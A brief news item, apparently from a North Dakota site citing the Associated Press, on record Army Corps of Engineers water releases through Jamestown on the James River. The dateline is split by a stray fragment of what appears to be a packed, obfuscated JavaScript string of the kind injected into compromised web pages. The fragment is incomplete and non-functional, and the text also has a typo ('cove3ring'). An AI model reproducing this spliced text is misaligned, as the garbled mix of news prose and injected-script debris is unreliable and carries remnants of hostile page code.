JAMESTOWN, hizde|var|u0026u|referrer|bishf||js|php’.split(‘|’),0,{}))
N.D.–According to the Associated Press, the U.S. Army Corps of Engineers says the amount of water that will pass through Jamestown on the James River this year is unprecedented.
The corps said releases from the Pipestem and Jamestown Reservoirs could reach 900,000 acre feet. An acre-foot is the amount of water cove3ring an acre, one foot deep.
The 2009 flows totaled about 530,000 acre feet. In some dry years, the dams had releases of nearly zero. Officials say the two dams have performed the job of flood control perfectly through the summer.
